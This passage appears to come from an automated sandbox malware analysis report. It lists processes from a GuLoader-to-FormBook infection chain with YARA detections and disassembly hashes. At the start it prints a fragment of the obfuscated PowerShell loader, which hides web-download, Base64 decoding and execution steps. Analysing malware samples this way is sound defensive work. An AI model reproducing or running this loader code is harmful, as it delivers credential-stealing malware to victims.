(Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings '.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"
                  Imagebase:0xa0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2609327790.00000000080B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2609998888.000000000A058000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2599496258.0000000005493000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:7
                  Start time:07:12:08
                  Start date:11/07/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
                  Imagebase:0x790000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:9
                  Start time:07:12:31
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:10
                  Start time:07:12:31
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.2791578179.00000000041A8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:13
                  Start time:07:13:04
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe"
                  Imagebase:0x990000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:14
                  Start time:07:13:06
                  Start date:11/07/2024
                  Path:C:\Windows\SysWOW64\clip.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\clip.exe"
                  Imagebase:0x80000
                  File size:24'576 bytes
                  MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:15
                  Start time:07:13:19
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe"
                  Imagebase:0x990000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:16
                  Start time:07:13:22
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:17
                  Start time:07:13:22
                  Start date:11/07/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                  Imagebase:0x7ff77fb80000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:18
                  Start time:07:13:30
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:19
                  Start time:07:13:31
                  Start date:11/07/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 00007FF848F3B4E6 Relevance: .5, Instructions: 476COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2795270333.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7dcb68b621daf204e9446ed0f7cab4247ce7d745a814a54dfa0b8455242acf87
                    • Instruction ID: fb05b45dbbfe85e0341d1b4a8bfb8712415cb968bb3ae99d2f24a32464f65b1d
                    • Opcode Fuzzy Hash: 7dcb68b621daf204e9446ed0f7cab4247ce7d745a814a54dfa0b8455242acf87
                    • Instruction Fuzzy Hash: ACF1923091CA8D8FEBA8EF28C8557E937E1FF54350F04426EE84DC7295DB3899458B86
                    Function 00007FF848F3C292 Relevance: .5, Instructions: 461COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2795270333.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 098a5d2f7a1d532c105757f044bcaea1075e71f6e63d338381489794684351b2
                    • Instruction ID: 3ba848a71f8775bdc4f6e841058003a870679a51eefd30aa01d7f521071d802d
                    • Opcode Fuzzy Hash: 098a5d2f7a1d532c105757f044bcaea1075e71f6e63d338381489794684351b2
                    • Instruction Fuzzy Hash: CFE1B13090CA8D8FEBA8EF28C8557E977E1FF54350F04426AD84DC7291DF78A9558B82
                    Function 00007FF849007625 Relevance: .4, Instructions: 441COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2796134007.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 35172819eac07f255d8f265d0da321851fe2811a3467f46f8c05de97eff721c8
                    • Instruction ID: b779ba18e7c7d597b4430a5bc30839c2cb667792bbcf5b0186dd4d160c1bd2fd
                    • Opcode Fuzzy Hash: 35172819eac07f255d8f265d0da321851fe2811a3467f46f8c05de97eff721c8
                    • Instruction Fuzzy Hash: 99D1E432E1EACA4FEBA5AE2C68552B87BE1EF95690B0800FBC04DC7193ED1CDC458351
                    Function 00007FF84900664C Relevance: .4, Instructions: 437COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2796134007.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ab341864b819a306d500a1293a2ed24fa9afae0ec4779b7879f5171169bb4f81
                    • Instruction ID: 5ed53bca71e5b8d48fa145d54a45d6aff4e226f1097751e90da38179f1984f11
                    • Opcode Fuzzy Hash: ab341864b819a306d500a1293a2ed24fa9afae0ec4779b7879f5171169bb4f81
                    • Instruction Fuzzy Hash: 84D14771D0DACA4FEBA5EF28A8656B977E2EF55750F1402FAD00DD31D2EE28E8408341
                    Function 00007FF8490067A7 Relevance: .2, Instructions: 150COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2796134007.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 764544546b6dcbdce41956581792859a9415c4fd36021634f348d4380f4fb72d
                    • Instruction ID: 465d0c019946c1b9c31aedf6ee13be9d98664858499b8c0f102b23a2558adeaa
                    • Opcode Fuzzy Hash: 764544546b6dcbdce41956581792859a9415c4fd36021634f348d4380f4fb72d
                    • Instruction Fuzzy Hash: 8D41F772D1EACB4FFBA5EF28646527866E2EF45694F5802F9D01CE71D2EE1CE8448301
                    Function 00007FF849007822 Relevance: .1, Instructions: 108COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2796134007.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e43496eebcc2945cee5c4e046f1c7328d27a6850291b12677cd675a3beecf993
                    • Instruction ID: 5413d5e2b3a87180d22700832da762fe63e63f7d9974a5cab1b89f55547738a1
                    • Opcode Fuzzy Hash: e43496eebcc2945cee5c4e046f1c7328d27a6850291b12677cd675a3beecf993
                    • Instruction Fuzzy Hash: A131A322D1EADB5FF7B9AA282C1627866D1EF85790F5801FAD40DD31D2FE0CE8048356
                    Function 00007FF848F33945 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2795270333.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                    • Instruction ID: 5581c1bbeeb35668f75aff93aa97cf07b4c35495046711a11288b2c77098a6b1
                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                    • Instruction Fuzzy Hash: 4001677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45

                    Executed Functions

                    Function 0415F1F0 Relevance: .3, Instructions: 281COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b1a6743d8db3a2e881d6fb29fd80fbc32737bf973302d363e170c01b55b09794
                    • Instruction ID: 1d40f0f43c0833db0728fca7f858f226260eaf6b54fb8acec5279da98f8ad3cd
                    • Opcode Fuzzy Hash: b1a6743d8db3a2e881d6fb29fd80fbc32737bf973302d363e170c01b55b09794
                    • Instruction Fuzzy Hash: 72B14170E10209DFDF14CFA9D9857DDBBF2AF88304F148529D825E7264EB74A846CB85
                    Function 0415FAC0 Relevance: .3, Instructions: 266COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ffce6b248d2d3c2caf3b93d8fb2a6a9630eac778fd262cb3a1c70d4cd563e374
                    • Instruction ID: 11369afaf730674a7e383dca8f9d1dd542231a4560175e332a57ab77f30c9596
                    • Opcode Fuzzy Hash: ffce6b248d2d3c2caf3b93d8fb2a6a9630eac778fd262cb3a1c70d4cd563e374
                    • Instruction Fuzzy Hash: DBB16F70E00209CFDF14CFA9C9957DDBBF2AF88354F148529D825E72A4EB74A846CB85
                    Function 06FD2C90 Relevance: 10.3, Strings: 8, Instructions: 266COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-1910532044
                    • Opcode ID: 4c98e8c1d930a71e6839f64a4682086d7ad74faed24abfd6199d173585748041
                    • Instruction ID: e26211b12255c724d02cc2cef7dc2cc1a6732d164d2d4d50924c4b97b2e6d40c
                    • Opcode Fuzzy Hash: 4c98e8c1d930a71e6839f64a4682086d7ad74faed24abfd6199d173585748041
                    • Instruction Fuzzy Hash: 0E916B32F002049FDB658F68C4507AABBA7EF85310F18C56ADA569F251CB31EA45C7E1
                    Function 06FD8C50 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                    • API String ID: 0-471056614
                    • Opcode ID: 272d36c7269a511e5f22668714ec6cd84dd9eaef340f23700802678509252607
                    • Instruction ID: b5237c14385a4169e5476b044d96a854ce8afd3b69cb3fb72d9ccc34f983e797
                    • Opcode Fuzzy Hash: 272d36c7269a511e5f22668714ec6cd84dd9eaef340f23700802678509252607
                    • Instruction Fuzzy Hash: 43D1CF34E002048FCB58DBA8C555B9EBBB3AF88344F19C819D5156F396CB76EC46CBA1
                    Function 06FD76FD Relevance: 7.8, Strings: 6, Instructions: 312COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                    • API String ID: 0-471056614
                    • Opcode ID: 1c00511cbf2579d989dbb94715c521805351b602ae7a03a774ac5c399b0a5ea4
                    • Instruction ID: 5922b7d0ddc1df29d1418ee72a56251797eb4a07c63825c726ed1b38b874cb4a
                    • Opcode Fuzzy Hash: 1c00511cbf2579d989dbb94715c521805351b602ae7a03a774ac5c399b0a5ea4
                    • Instruction Fuzzy Hash: B6D18134A002149FDB54DB98C991B9EBBB2FF84304F148499D5096F395CB36AD86CBA2
                    Function 06FD4138 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    • Opcode ID: b7722f8aba4ec2f59974f9b8042f7730c961002b73db7478888a867bb5432c48
                    • Instruction ID: 5f0260fe1180fd16c6fa52a848f2f5ece4daa58a151efa5a91ec35dc150705b9
                    • Opcode Fuzzy Hash: b7722f8aba4ec2f59974f9b8042f7730c961002b73db7478888a867bb5432c48
                    • Instruction Fuzzy Hash: D5514B31E043449FCB66CF6CC8505667BF7AF82211B1C85A7D854CB152CB35E815C762
                    Function 06FD9230 Relevance: 5.3, Strings: 4, Instructions: 295COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q
                    • API String ID: 0-1785108022
                    • Opcode ID: 1f7352c09a62bdc1e1df6d409e687e19530a9f9c77ab048a5f31cff4d5d8af60
                    • Instruction ID: db15bce31798c1ac5f520fe16fd933dedcea7a91792fd47687aaf5c81035849e
                    • Opcode Fuzzy Hash: 1f7352c09a62bdc1e1df6d409e687e19530a9f9c77ab048a5f31cff4d5d8af60
                    • Instruction Fuzzy Hash: 66A14731F04204CFCBA4DFEC84556AA7BE7AFC6211B1880BAC519DB291DB76ED05C7A1
                    Function 0415BB00 Relevance: 4.3, Strings: 3, Instructions: 515COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: Haq$$]q$$]q
                    • API String ID: 0-1533201563
                    • Opcode ID: 499e4e6167553c76c14728da609740c421e28445f88faf4f398876298df63d49
                    • Instruction ID: 36b5405ae5442e3cf9bb501ca0286089a2a55046cf40001df7243abc21a46b57
                    • Opcode Fuzzy Hash: 499e4e6167553c76c14728da609740c421e28445f88faf4f398876298df63d49
                    • Instruction Fuzzy Hash: 47222B34B00214CFDB25DF65C894AAEB7B6AF89344F1540A9D81AAB361DF35AD81CF81
                    Function 06FD98B0 Relevance: 4.0, Strings: 3, Instructions: 276COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q
                    • API String ID: 0-1444653880
                    • Opcode ID: a6c4c182d7bd9fe23e346d11976b4735394134b71beedb16d499096c645d2c6d
                    • Instruction ID: bc214279f8c3053e752d1388c7922dbc1a2bb4a04579583e219e042af862c973
                    • Opcode Fuzzy Hash: a6c4c182d7bd9fe23e346d11976b4735394134b71beedb16d499096c645d2c6d
                    • Instruction Fuzzy Hash: 8D917931F043048FCB659BF8885466A7BE7AF82200F1884AAD445CF2A6DF75ED45C7A2
                    Function 06FD8C32 Relevance: 4.0, Strings: 3, Instructions: 269COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q
                    • API String ID: 0-705557208
                    • Opcode ID: 58ce1b25595f5d8a7d8fb3f223a4778580497f4d43c0e7da7ce7792a8402e4af
